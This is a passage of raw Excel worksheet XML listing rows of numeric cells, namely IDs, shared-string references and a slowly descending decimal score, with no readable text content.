      <c r="B9908" s="2">
        <v>3993072.0</v>
      </c>
      <c r="C9908" s="2" t="s">
        <v>9472</v>
      </c>
      <c r="D9908" s="2">
        <v>1.0</v>
      </c>
      <c r="E9908" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9908" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9909" ht="15.75" customHeight="1">
      <c r="A9909" s="1">
        <v>30942.0</v>
      </c>
      <c r="B9909" s="2">
        <v>4.7313137E7</v>
      </c>
      <c r="C9909" s="2" t="s">
        <v>9473</v>
      </c>
      <c r="D9909" s="2">
        <v>1.0</v>
      </c>
      <c r="E9909" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9909" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9910" ht="15.75" customHeight="1">
      <c r="A9910" s="1">
        <v>34098.0</v>
      </c>
      <c r="B9910" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C9910" s="2" t="s">
        <v>9474</v>
      </c>
      <c r="D9910" s="2">
        <v>1.0</v>
      </c>
      <c r="E9910" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9910" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9911" ht="15.75" customHeight="1">
      <c r="A9911" s="1">
        <v>476.0</v>
      </c>
      <c r="B9911" s="2">
        <v>1.7417009E7</v>
      </c>
      <c r="C9911" s="2" t="s">
        <v>9475</v>
      </c>
      <c r="D9911" s="2">
        <v>1.0</v>
      </c>
      <c r="E9911" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9911" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9912" ht="15.75" customHeight="1">
      <c r="A9912" s="1">
        <v>2038.0</v>
      </c>
      <c r="B9912" s="2">
        <v>3.0868677E7</v>
      </c>
      <c r="C9912" s="2" t="s">
        <v>9476</v>
      </c>
      <c r="D9912" s="2">
        <v>1.0</v>
      </c>
      <c r="E9912" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9912" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9913" ht="15.75" customHeight="1">
      <c r="A9913" s="1">
        <v>3453.0</v>
      </c>
      <c r="B9913" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C9913" s="2" t="s">
        <v>9477</v>
      </c>
      <c r="D9913" s="2">
        <v>1.0</v>
      </c>
      <c r="E9913" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9913" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9914" ht="15.75" customHeight="1">
      <c r="A9914" s="1">
        <v>6073.0</v>
      </c>
      <c r="B9914" s="2">
        <v>4.763503E7</v>
      </c>
      <c r="C9914" s="2" t="s">
        <v>9478</v>
      </c>
      <c r="D9914" s="2">
        <v>1.0</v>
      </c>
      <c r="E9914" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9914" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9915" ht="15.75" customHeight="1">
      <c r="A9915" s="1">
        <v>10115.0</v>
      </c>
      <c r="B9915" s="2">
        <v>5.7250737E7</v>
      </c>
      <c r="C9915" s="2" t="s">
        <v>9479</v>
      </c>
      <c r="D9915" s="2">
        <v>1.0</v>
      </c>
      <c r="E9915" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9915" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9916" ht="15.75" customHeight="1">
      <c r="A9916" s="1">
        <v>10262.0</v>
      </c>
      <c r="B9916" s="2">
        <v>5.7580206E7</v>
      </c>
      <c r="C9916" s="2" t="s">
        <v>9480</v>
      </c>
      <c r="D9916" s="2">
        <v>1.0</v>
      </c>
      <c r="E9916" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9916" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9917" ht="15.75" customHeight="1">
      <c r="A9917" s="1">
        <v>11293.0</v>
      </c>
      <c r="B9917" s="2">
        <v>2.0935614E7</v>
      </c>
      <c r="C9917" s="2" t="s">
        <v>9481</v>
      </c>
      <c r="D9917" s="2">
        <v>1.0</v>
      </c>
      <c r="E9917" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9917" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9918" ht="15.75" customHeight="1">
      <c r="A9918" s="1">
        <v>13254.0</v>
      </c>
      <c r="B9918" s="2">
        <v>3.4286199E7</v>
      </c>
      <c r="C9918" s="2" t="s">
        <v>9482</v>
      </c>
      <c r="D9918" s="2">
        <v>1.0</v>
      </c>
      <c r="E9918" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9918" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9919" ht="15.75" customHeight="1">
      <c r="A9919" s="1">
        <v>13547.0</v>
      </c>
      <c r="B9919" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C9919" s="2" t="s">
        <v>9483</v>
      </c>
      <c r="D9919" s="2">
        <v>1.0</v>
      </c>
      <c r="E9919" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9919" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9920" ht="15.75" customHeight="1">
      <c r="A9920" s="1">
        <v>15423.0</v>
      </c>
      <c r="B9920" s="2">
        <v>4.2891197E7</v>
      </c>
      <c r="C9920" s="2" t="s">
        <v>9484</v>
      </c>
      <c r="D9920" s="2">
        <v>1.0</v>
      </c>
      <c r="E9920" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9920" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9921" ht="15.75" customHeight="1">
      <c r="A9921" s="1">
        <v>26058.0</v>
      </c>
      <c r="B9921" s="2">
        <v>1.5524904E7</v>
      </c>
      <c r="C9921" s="2" t="s">
        <v>9485</v>
      </c>
      <c r="D9921" s="2">
        <v>1.0</v>
      </c>
      <c r="E9921" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9921" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9922" ht="15.75" customHeight="1">
      <c r="A9922" s="1">
        <v>26668.0</v>
      </c>
      <c r="B9922" s="2">
        <v>1.8062124E7</v>
      </c>
      <c r="C9922" s="2" t="s">
        <v>9486</v>
      </c>
      <c r="D9922" s="2">
        <v>1.0</v>
      </c>
      <c r="E9922" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9922" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9923" ht="15.75" customHeight="1">
      <c r="A9923" s="1">
        <v>26672.0</v>
      </c>
      <c r="B9923" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C9923" s="2" t="s">
        <v>9486</v>
      </c>
      <c r="D9923" s="2">
        <v>1.0</v>
      </c>
      <c r="E9923" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9923" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9924" ht="15.75" customHeight="1">
      <c r="A9924" s="1">
        <v>26677.0</v>
      </c>
      <c r="B9924" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C9924" s="2" t="s">
        <v>9486</v>
      </c>
      <c r="D9924" s="2">
        <v>1.0</v>
      </c>
      <c r="E9924" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9924" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9925" ht="15.75" customHeight="1">
      <c r="A9925" s="1">
        <v>29197.0</v>
      </c>
      <c r="B9925" s="2">
        <v>3.076095E7</v>
      </c>
      <c r="C9925" s="2" t="s">
        <v>9487</v>
      </c>
      <c r="D9925" s="2">
        <v>1.0</v>
      </c>
      <c r="E9925" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9925" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9926" ht="15.75" customHeight="1">
      <c r="A9926" s="1">
        <v>33639.0</v>
      </c>
      <c r="B9926" s="2">
        <v>8375347.0</v>
      </c>
      <c r="C9926" s="2" t="s">
        <v>9488</v>
      </c>
      <c r="D9926" s="2">
        <v>1.0</v>
      </c>
      <c r="E9926" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9926" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="9927" ht="15.75" customHeight="1">
      <c r="A9927" s="1">
        <v>1163.0</v>
      </c>
      <c r="B9927" s="2">
        <v>2.4519855E7</v>
      </c>
      <c r="C9927" s="2" t="s">
        <v>9489</v>
      </c>
      <c r="D9927" s="2">
        <v>1.0</v>
      </c>
      <c r="E9927" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9927" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="9928" ht="15.75" customHeight="1">
      <c r="A9928" s="1">
        <v>12101.0</v>
      </c>
      <c r="B9928" s="2">
        <v>2.6751945E7</v>
      </c>
      <c r="C9928" s="2" t="s">
        <v>9490</v>
      </c>
      <c r="D9928" s="2">
        <v>1.0</v>
      </c>
      <c r="E9928" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9928" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="9929" ht="15.75" customHeight="1">
      <c r="A9929" s="1">
        <v>13555.0</v>
      </c>
      <c r="B9929" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C9929" s="2" t="s">
        <v>9491</v>
      </c>
      <c r="D9929" s="2">
        <v>1.0</v>
      </c>
      <c r="E9929" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9929" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="9930" ht="15.75" customHeight="1">
      <c r="A9930" s="1">
        <v>17823.0</v>
      </c>
      <c r="B9930" s="2">
        <v>5.0915743E7</v>
      </c>
      <c r="C9930" s="2" t="s">
        <v>9492</v>
      </c>
      <c r="D9930" s="2">
        <v>1.0</v>
      </c>
      <c r="E9930" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9930" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="9931" ht="15.75" customHeight="1">
      <c r="A9931" s="1">
        <v>17976.0</v>
      </c>
      <c r="B9931" s="2">
        <v>5.1362287E7</v>
      </c>
      <c r="C9931" s="2" t="s">
        <v>9493</v>
      </c>
      <c r="D9931" s="2">
        <v>1.0</v>
      </c>
      <c r="E9931" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9931" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="9932" ht="15.75" customHeight="1">
      <c r="A9932" s="1">
        <v>34208.0</v>
      </c>
      <c r="B9932" s="2">
        <v>2.1774424E7</v>
      </c>
      <c r="C9932" s="2" t="s">
        <v>9494</v>
      </c>
      <c r="D9932" s="2">
        <v>1.0</v>
      </c>
      <c r="E9932" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9932" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="9933" ht="15.75" customHeight="1">
      <c r="A9933" s="1">
        <v>16025.0</v>
      </c>
      <c r="B9933" s="2">
        <v>4.5090471E7</v>
      </c>
      <c r="C9933" s="2" t="s">
        <v>9495</v>
      </c>
      <c r="D9933" s="2">
        <v>1.0</v>
      </c>
      <c r="E9933" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9933" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="9934" ht="15.75" customHeight="1">
      <c r="A9934" s="1">
        <v>30104.0</v>
      </c>
      <c r="B9934" s="2">
        <v>3.6564288E7</v>
      </c>
      <c r="C9934" s="2" t="s">
        <v>9496</v>
      </c>
      <c r="D9934" s="2">
        <v>1.0</v>
      </c>
      <c r="E9934" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9934" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="9935" ht="15.75" customHeight="1">
      <c r="A9935" s="1">
        <v>3757.0</v>
      </c>
      <c r="B9935" s="2">
        <v>3.9741533E7</v>
      </c>
      <c r="C9935" s="2" t="s">
        <v>9497</v>
      </c>
      <c r="D9935" s="2">
        <v>1.0</v>
      </c>
      <c r="E9935" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9935" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="9936" ht="15.75" customHeight="1">
      <c r="A9936" s="1">
        <v>8584.0</v>
      </c>
      <c r="B9936" s="2">
        <v>5.4225775E7</v>
      </c>
      <c r="C9936" s="2" t="s">
        <v>9498</v>
      </c>
      <c r="D9936" s="2">
        <v>1.0</v>
      </c>
      <c r="E9936" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9936" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="9937" ht="15.75" customHeight="1">
      <c r="A9937" s="1">
        <v>15243.0</v>
      </c>
      <c r="B9937" s="2">
        <v>4.227146E7</v>
      </c>
      <c r="C9937" s="2" t="s">
        <v>9499</v>
      </c>
      <c r="D9937" s="2">
        <v>1.0</v>
      </c>
      <c r="E9937" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9937" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="9938" ht="15.75" customHeight="1">
      <c r="A9938" s="1">
        <v>2263.0</v>
      </c>
      <c r="B9938" s="2">
        <v>3.2426201E7</v>
      </c>
      <c r="C9938" s="2" t="s">
        <v>9500</v>
      </c>
      <c r="D9938" s="2">
        <v>1.0</v>
      </c>
      <c r="E9938" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9938" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="9939" ht="15.75" customHeight="1">
      <c r="A9939" s="1">
        <v>3019.0</v>
      </c>
      <c r="B9939" s="2">
        <v>3.6417677E7</v>
      </c>
      <c r="C9939" s="2" t="s">
        <v>9501</v>
      </c>
      <c r="D9939" s="2">
        <v>1.0</v>
      </c>
      <c r="E9939" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9939" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="9940" ht="15.75" customHeight="1">
      <c r="A9940" s="1">
        <v>9141.0</v>
      </c>
      <c r="B9940" s="2">
        <v>5.5246852E7</v>
      </c>
      <c r="C9940" s="2" t="s">
        <v>9502</v>
      </c>
      <c r="D9940" s="2">
        <v>1.0</v>
      </c>
      <c r="E9940" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9940" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="9941" ht="15.75" customHeight="1">
      <c r="A9941" s="1">
        <v>15727.0</v>
      </c>
      <c r="B9941" s="2">
        <v>4.4027795E7</v>
      </c>
      <c r="C9941" s="2" t="s">
        <v>9503</v>
      </c>
      <c r="D9941" s="2">
        <v>1.0</v>
      </c>
      <c r="E9941" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9941" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="9942" ht="15.75" customHeight="1">
      <c r="A9942" s="1">
        <v>30178.0</v>
      </c>
      <c r="B9942" s="2">
        <v>3716326.0</v>
      </c>
      <c r="C9942" s="2" t="s">
        <v>9504</v>
      </c>
      <c r="D9942" s="2">
        <v>1.0</v>
      </c>
      <c r="E9942" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9942" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="9943" ht="15.75" customHeight="1">
      <c r="A9943" s="1">
        <v>649.0</v>
      </c>
      <c r="B9943" s="2">
        <v>1.9916921E7</v>
      </c>
      <c r="C9943" s="2" t="s">
        <v>9505</v>
      </c>
      <c r="D9943" s="2">
        <v>1.0</v>
      </c>
      <c r="E9943" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9943" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="9944" ht="15.75" customHeight="1">
      <c r="A9944" s="1">
        <v>12924.0</v>
      </c>
      <c r="B9944" s="2">
        <v>3.230255E7</v>
      </c>
      <c r="C9944" s="2" t="s">
        <v>9506</v>
      </c>
      <c r="D9944" s="2">
        <v>1.0</v>
      </c>
      <c r="E9944" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9944" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="9945" ht="15.75" customHeight="1">
      <c r="A9945" s="1">
        <v>926.0</v>
      </c>
      <c r="B9945" s="2">
        <v>2.2328324E7</v>
      </c>
      <c r="C9945" s="2" t="s">
        <v>9507</v>
      </c>
      <c r="D9945" s="2">
        <v>1.0</v>
      </c>
      <c r="E9945" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9945" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="9946" ht="15.75" customHeight="1">
      <c r="A9946" s="1">
        <v>10247.0</v>
      </c>
      <c r="B9946" s="2">
        <v>5.7546519E7</v>
      </c>
      <c r="C9946" s="2" t="s">
        <v>9508</v>
      </c>
      <c r="D9946" s="2">
        <v>1.0</v>
      </c>
      <c r="E9946" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9946" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="9947" ht="15.75" customHeight="1">
      <c r="A9947" s="1">
        <v>10601.0</v>
      </c>
      <c r="B9947" s="2">
        <v>1.3612372E7</v>
      </c>
      <c r="C9947" s="2" t="s">
        <v>9509</v>
      </c>
      <c r="D9947" s="2">
        <v>1.0</v>
      </c>
      <c r="E9947" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9947" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="9948" ht="15.75" customHeight="1">
      <c r="A9948" s="1">
        <v>23874.0</v>
      </c>
      <c r="B9948" s="2">
        <v>8353602.0</v>
      </c>
      <c r="C9948" s="2" t="s">
        <v>9034</v>
      </c>
      <c r="D9948" s="2">
        <v>1.0</v>
      </c>
      <c r="E9948" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9948" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="9949" ht="15.75" customHeight="1">
      <c r="A9949" s="1">
        <v>27021.0</v>
      </c>
      <c r="B9949" s="2">
        <v>2.0036703E7</v>
      </c>
      <c r="C9949" s="2" t="s">
        <v>9510</v>
      </c>
      <c r="D9949" s="2">
        <v>1.0</v>
      </c>
      <c r="E9949" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9949" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="9950" ht="15.75" customHeight="1">
      <c r="A9950" s="1">
        <v>32429.0</v>
      </c>
      <c r="B9950" s="2">
        <v>5.6509115E7</v>
      </c>
      <c r="C9950" s="2" t="s">
        <v>9511</v>
      </c>
      <c r="D9950" s="2">
        <v>1.0</v>
      </c>
      <c r="E9950" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9950" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="9951" ht="15.75" customHeight="1">
      <c r="A9951" s="1">
        <v>5127.0</v>
      </c>
      <c r="B9951" s="2">
        <v>4.458278E7</v>
      </c>
      <c r="C9951" s="2" t="s">
        <v>9512</v>
      </c>
      <c r="D9951" s="2">
        <v>1.0</v>
      </c>
      <c r="E9951" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9951" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="9952" ht="15.75" customHeight="1">
      <c r="A9952" s="1">
        <v>7865.0</v>
      </c>
      <c r="B9952" s="2">
        <v>5.2389597E7</v>
      </c>
      <c r="C9952" s="2" t="s">
        <v>9513</v>
      </c>
      <c r="D9952" s="2">
        <v>1.0</v>
      </c>
      <c r="E9952" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9952" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="9953" ht="15.75" customHeight="1">
      <c r="A9953" s="1">
        <v>8286.0</v>
      </c>
      <c r="B9953" s="2">
        <v>5.3510785E7</v>
      </c>
      <c r="C9953" s="2" t="s">
        <v>9514</v>
      </c>
      <c r="D9953" s="2">
        <v>1.0</v>
      </c>
      <c r="E9953" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9953" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="9954" ht="15.75" customHeight="1">
      <c r="A9954" s="1">
        <v>15758.0</v>
      </c>
      <c r="B9954" s="2">
        <v>4.4159626E7</v>
      </c>
      <c r="C9954" s="2" t="s">
        <v>9515</v>
      </c>
      <c r="D9954" s="2">
        <v>1.0</v>
      </c>
      <c r="E9954" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9954" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="9955" ht="15.75" customHeight="1">
      <c r="A9955" s="1">
        <v>313.0</v>
      </c>
      <c r="B9955" s="2">
        <v>1.5621246E7</v>
      </c>
      <c r="C9955" s="2" t="s">
        <v>9516</v>
      </c>
      <c r="D9955" s="2">
        <v>1.0</v>
      </c>
      <c r="E9955" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9955" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9956" ht="15.75" customHeight="1">
      <c r="A9956" s="1">
        <v>3276.0</v>
      </c>
      <c r="B9956" s="2">
        <v>3.7486296E7</v>
      </c>
      <c r="C9956" s="2" t="s">
        <v>9517</v>
      </c>
      <c r="D9956" s="2">
        <v>1.0</v>
      </c>
      <c r="E9956" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9956" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9957" ht="15.75" customHeight="1">
      <c r="A9957" s="1">
        <v>4483.0</v>
      </c>
      <c r="B9957" s="2">
        <v>4.2502922E7</v>
      </c>
      <c r="C9957" s="2" t="s">
        <v>9518</v>
      </c>
      <c r="D9957" s="2">
        <v>1.0</v>
      </c>
      <c r="E9957" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9957" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9958" ht="15.75" customHeight="1">
      <c r="A9958" s="1">
        <v>4847.0</v>
      </c>
      <c r="B9958" s="2">
        <v>4.370664E7</v>
      </c>
      <c r="C9958" s="2" t="s">
        <v>9519</v>
      </c>
      <c r="D9958" s="2">
        <v>1.0</v>
      </c>
      <c r="E9958" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9958" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9959" ht="15.75" customHeight="1">
      <c r="A9959" s="1">
        <v>7897.0</v>
      </c>
      <c r="B9959" s="2">
        <v>5.2463105E7</v>
      </c>
      <c r="C9959" s="2" t="s">
        <v>9520</v>
      </c>
      <c r="D9959" s="2">
        <v>1.0</v>
      </c>
      <c r="E9959" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9959" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9960" ht="15.75" customHeight="1">
      <c r="A9960" s="1">
        <v>8994.0</v>
      </c>
      <c r="B9960" s="2">
        <v>5.4965526E7</v>
      </c>
      <c r="C9960" s="2" t="s">
        <v>9521</v>
      </c>
      <c r="D9960" s="2">
        <v>1.0</v>
      </c>
      <c r="E9960" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9960" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9961" ht="15.75" customHeight="1">
      <c r="A9961" s="1">
        <v>11395.0</v>
      </c>
      <c r="B9961" s="2">
        <v>2.1564647E7</v>
      </c>
      <c r="C9961" s="2" t="s">
        <v>9522</v>
      </c>
      <c r="D9961" s="2">
        <v>1.0</v>
      </c>
      <c r="E9961" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9961" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9962" ht="15.75" customHeight="1">
      <c r="A9962" s="1">
        <v>18051.0</v>
      </c>
      <c r="B9962" s="2">
        <v>5.1576046E7</v>
      </c>
      <c r="C9962" s="2" t="s">
        <v>9523</v>
      </c>
      <c r="D9962" s="2">
        <v>1.0</v>
      </c>
      <c r="E9962" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9962" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="9963" ht="15.75" customHeight="1">
      <c r="A9963" s="1">
        <v>893.0</v>
      </c>
      <c r="B9963" s="2">
        <v>2.2030024E7</v>
      </c>
      <c r="C9963" s="2" t="s">
        <v>9524</v>
      </c>
      <c r="D9963" s="2">
        <v>1.0</v>
      </c>
      <c r="E9963" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9963" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9964" ht="15.75" customHeight="1">
      <c r="A9964" s="1">
        <v>3264.0</v>
      </c>
      <c r="B9964" s="2">
        <v>3.7455136E7</v>
      </c>
      <c r="C9964" s="2" t="s">
        <v>9525</v>
      </c>
      <c r="D9964" s="2">
        <v>1.0</v>
      </c>
      <c r="E9964" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9964" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9965" ht="15.75" customHeight="1">
      <c r="A9965" s="1">
        <v>6343.0</v>
      </c>
      <c r="B9965" s="2">
        <v>4.8306299E7</v>
      </c>
      <c r="C9965" s="2" t="s">
        <v>9526</v>
      </c>
      <c r="D9965" s="2">
        <v>1.0</v>
      </c>
      <c r="E9965" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9965" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9966" ht="15.75" customHeight="1">
      <c r="A9966" s="1">
        <v>10332.0</v>
      </c>
      <c r="B9966" s="2">
        <v>5.7716955E7</v>
      </c>
      <c r="C9966" s="2" t="s">
        <v>9527</v>
      </c>
      <c r="D9966" s="2">
        <v>1.0</v>
      </c>
      <c r="E9966" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9966" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9967" ht="15.75" customHeight="1">
      <c r="A9967" s="1">
        <v>10985.0</v>
      </c>
      <c r="B9967" s="2">
        <v>1.7409275E7</v>
      </c>
      <c r="C9967" s="2" t="s">
        <v>9528</v>
      </c>
      <c r="D9967" s="2">
        <v>1.0</v>
      </c>
      <c r="E9967" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9967" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9968" ht="15.75" customHeight="1">
      <c r="A9968" s="1">
        <v>15536.0</v>
      </c>
      <c r="B9968" s="2">
        <v>4.3323291E7</v>
      </c>
      <c r="C9968" s="2" t="s">
        <v>9529</v>
      </c>
      <c r="D9968" s="2">
        <v>1.0</v>
      </c>
      <c r="E9968" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9968" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9969" ht="15.75" customHeight="1">
      <c r="A9969" s="1">
        <v>16318.0</v>
      </c>
      <c r="B9969" s="2">
        <v>4.5981123E7</v>
      </c>
      <c r="C9969" s="2" t="s">
        <v>9530</v>
      </c>
      <c r="D9969" s="2">
        <v>1.0</v>
      </c>
      <c r="E9969" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9969" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9970" ht="15.75" customHeight="1">
      <c r="A9970" s="1">
        <v>18139.0</v>
      </c>
      <c r="B9970" s="2">
        <v>5.18275E7</v>
      </c>
      <c r="C9970" s="2" t="s">
        <v>9531</v>
      </c>
      <c r="D9970" s="2">
        <v>1.0</v>
      </c>
      <c r="E9970" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9970" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9971" ht="15.75" customHeight="1">
      <c r="A9971" s="1">
        <v>33235.0</v>
      </c>
      <c r="B9971" s="2">
        <v>7287463.0</v>
      </c>
      <c r="C9971" s="2" t="s">
        <v>9532</v>
      </c>
      <c r="D9971" s="2">
        <v>1.0</v>
      </c>
      <c r="E9971" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9971" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="9972" ht="15.75" customHeight="1">
      <c r="A9972" s="1">
        <v>30483.0</v>
      </c>
      <c r="B9972" s="2">
        <v>3.9865378E7</v>
      </c>
      <c r="C9972" s="2" t="s">
        <v>9533</v>
      </c>
      <c r="D9972" s="2">
        <v>1.0</v>
      </c>
      <c r="E9972" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9972" s="2">
        <v>0.1053067993366501</v>
      </c>
    </row>
    <row r="9973" ht="15.75" customHeight="1">
      <c r="A9973" s="1">
        <v>95.0</v>
      </c>
      <c r="B9973" s="2">
        <v>1.2161784E7</v>
      </c>
      <c r="C9973" s="2" t="s">
        <v>9534</v>
      </c>
      <c r="D9973" s="2">
        <v>1.0</v>
      </c>
      <c r="E9973" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9973" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="9974" ht="15.75" customHeight="1">
      <c r="A9974" s="1">
        <v>1977.0</v>
      </c>
      <c r="B9974" s="2">
        <v>3.0422567E7</v>
      </c>
      <c r="C9974" s="2" t="s">
        <v>9535</v>
      </c>
      <c r="D9974" s="2">
        <v>1.0</v>
      </c>
      <c r="E9974" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9974" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="9975" ht="15.75" customHeight="1">
      <c r="A9975" s="1">
        <v>1354.0</v>
      </c>
      <c r="B9975" s="2">
